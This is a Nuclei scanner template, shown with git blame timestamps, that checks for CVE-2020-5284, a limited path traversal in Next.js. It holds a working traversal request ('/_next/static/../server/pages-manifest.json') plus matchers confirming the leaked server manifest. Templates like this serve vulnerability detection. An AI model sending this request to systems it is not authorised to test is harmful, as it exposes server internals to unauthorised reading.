nuclei-templates/cves/CVE-2020-5284.yaml

25 lines
503 B
YAML
Raw Normal View History

2020-04-15 12:06:26 +00:00
id: CVE-2020-5284
2020-04-05 18:24:33 +00:00
info:
name: Next.js .next/ limited path traversal
author: Harsh & Rahul & dwisiswant0
2020-04-05 18:24:33 +00:00
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/_next/static/../server/pages-manifest.json"
2020-07-08 08:45:18 +00:00
matchers-condition: and
2020-04-05 18:24:33 +00:00
matchers:
- type: regex
regex:
- '\{"/_app":".*?_app\.js"'
part: body
- type: word
words:
- "application/json"
part: header
2020-04-05 18:24:33 +00:00
- type: status
status:
- 200